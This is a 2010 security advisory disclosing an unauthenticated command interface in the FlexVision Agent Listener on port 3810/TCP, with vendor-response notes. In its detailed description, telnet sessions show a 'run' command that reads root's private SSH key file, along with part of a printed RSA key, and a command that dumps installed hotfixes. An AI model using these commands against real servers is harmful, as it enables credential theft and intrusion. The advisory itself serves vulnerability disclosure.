=====[ Tempest Security Intelligence - Advisory #02 / 2010 ]============= Information Disclosure Vulnerability in FlexVision Agent Listener ----------------------------------------------------------------- Authors: Victor Ribeiro Hora > Tempest Security Intelligence - Brazil =====[ Table of Contents ]================================= 1. Overview 2. Detailed description 3. Additional context & Solutions 4. References 5. Thanks =====[ Overview ]====================================== * System affected: FlexVision Agent Listener 1.3 for Windows, Linux and Solaris (other versions may be vulnerable) * Release date: 22 October 2010 * Impact: Successful exploitation of this vulnerability may lead to remote server sensitive information disclosure. FlexVision [1] claims to be an IT service focused on hardware and software management, offering features like capacity planning, SLA monitoring and systems inventory. The service is used by several major companies in Brazil, including banking, telecom, energy, health and independent product sectors. The vulnerability was found in the inventory agent listener or "fval". Exploitation of this weakness does not require any authentication and may lead to remote disclosure of sensitive information from the server running the agent. Specifically, an attacker can download non-binary files, and list running services, running processes and installed software. It seems there is some active filtering for known sensitive data, but other sensitive information may leak. =====[ Detailed description ]================================ FlexVision Inventory service has several agents (servers) to collect data from different platforms and send them to a central console on the network. These agents are installed on the hardware to be monitored and listen for incoming client connections. One of the agents that was analyzed is the "FlexVision Actions Listener 1.3 for Linux", used for the inventory of Linux systems. This agent is executed by a Linux binary called "fval" started at boot time through an initscript in /etc/init.d/rc.fval. Apparently the fval binary executes a chdir() to /opt/flex/plugins, then it opens a socket listening for connections on port 3810/TCP in daemon mode. As soon as the TCP Three-Way Handshake is completed, the agent keeps waiting for "commands" to perform the various inventory functions. These commands are interpreted as internal functions of the fval binary, such as help, version, exit or run. Specifically, the run function expects a parameter. We noted that this parameter is a bash script file in the /opt/flex/plugins directory. This script is executed by the fval binary, and the output of the script is returned on the same TCP connection to the central console application. These commands are normally sent from a central console to the monitored agent. As the connection is not authenticated nor encrypted in any way, it gives the possibility of any computer that has access to the 3810/TCP port of any agent, sending commands to be executed by the agent. In spite of the fact that the agent uses an active filter for some well known sensitive data (like password hashes in the "shadow" file, for example), it is possible to get other not easily predictable but sensitive data. Some special chars we tested were also filtered, such as '*', ';', '>' , and also white spaces, tabs and other special delimiters used on bash and other shells. The following is an example of the recovery of a private SSH RSA key file that belongs to the root user on a Linux server: ----------------------------------------------------------------------- vrh@victim01:~$ telnet 192.168.1.1 3810 Trying 192.168.1.1... Connected to 192.168.1.1. Escape character is '^]'. FVAL>run symonfile.sh /root/.ssh id_rsa -----BEGIN RSA PRIVATE KEY----- MIIEogIBAAKCAQEA3wKpWZ0xgmIWX4JVb72wt5STGdhr2x0whvY25hhNfI9zpNIG eV0zRXy4hbVqRvcJVu3+Ho6ZyXIg8bVzljFJdx/anBs5KLrlvfoMDrgwNWtp8Slz Fuhfp7ej0wr57ZRyKq4imz3vvle24SRtROymSMDCtolbY4wZFCRu6JJ+3jAVqlxJ 9YMdVqL7BoF0Nbp+s7FqIdbpwwOtcS0PpprvWTbFcQ+z3ReN7B7SybZTkuZPD56o z1QtnzhgnVFHBD3TPXPorKf42uuDeW3twFKYlFOuSmz46tKCsbBoM8TBPNtYCvAe 3G7Aj0R/jvBdL9+hz/cG+riwL0NYTSe7uTO4kQIBIwKCAQATHXw64ZaHhMAW0Kg8 xx3Gl7TWVGEEJxLJvVUpqk/I2RiKeGb0dbPwA2BF+ZtlKx4Ow/E10bVpCchPO3BO s8R37MmYWhrXmv2/05qiLQtySwkUq8gJRx4kUZGzAPDZ2YYg6lq82WxSJMaIU5RW XW1WsW/GgM1RrOw07S4T70yz9VUvFo4M5m7GMP0AjffvJv8dhABNRPV1uzBGqjyV ----------------------------------------------------------------------- Just like Linux fval, on Windows it's also possible to dump any non-binary file. It's worth saying that as fval always runs as privileged user (Administrator/root), all the system files are accessible and most of them are readable. Windows hosts behave similary. As soon as the Agent is installed, it is registered as a System Service and runs at boot time. This service runs the fval binary located at %SystemDrive%\%ProgramFiles%\Flexvision. Then, fval will run any file in the %SystemDrive%\%ProgramFiles%\Flexvision\Plugins directory. By default, Windows fval has several 32bit Portable Executable (.EXE) files to provide inventory data to the central console, but most interesting is the hotfix.exe file, which lists all the installed HotFixes on the host: ----------------------------------------------------------------------- vrh@victim01:~$ telnet 192.168.1.2 3810 Trying 192.168.1.2... Connected to 192.168.1.2. Escape character is '^]'. FVAL>run hotfix.exe Hot Fix ID.75=File 1 Service pack afetado.75=KB956801 Instalado por.75= Descricao.76= Hot Fix ID.76=File 1 Service pack afetado.76=KB956806 Instalado por.76= Descricao.77= Hot Fix ID.77=File 1 Service pack afetado.77=KB956848 Instalado por.77= ----------------------------------------------------------------------- With that sort of info it would be possible to plan and execute a much more precise attack against the host. =====[ Other contexts & Solutions ]============================ As usual [2], we contacted the vendor. After some weeks, they released version 1.4 that usessource IP based access (whitelist policy) and a static key for authentication, but nothing to address the actual problem: no strong authentication scheme and no encrypted client-server traffic. Version 2.0 was just released, the vendor states that this version uses encrypted client-server communication, but we were unable to test it until now. After waiting a few months, FlexVision did not provide us a public URL with an actual fix which addresses this problem to attach in this publication. =====[ Thanks ]======================================== - Tempest Security Intelligence [3] - Tempest MSS Team - Evandro Curvelo Hora > - Marco "Kiko" Carnut > - Cristiano Lincoln Mattos > - Aldo Albuquerque > =====[ References ]====================================== [1] http://www.flexvision.com.br/ [2] http://www.cert.org/kb/vul_disclosure.html [3] http://www.tempest.com.br/ =================================================== -- Victor Ribeiro Hora Network Security Analyst & Security Baselines development Tempest Security Intelligence www.tempest.com.br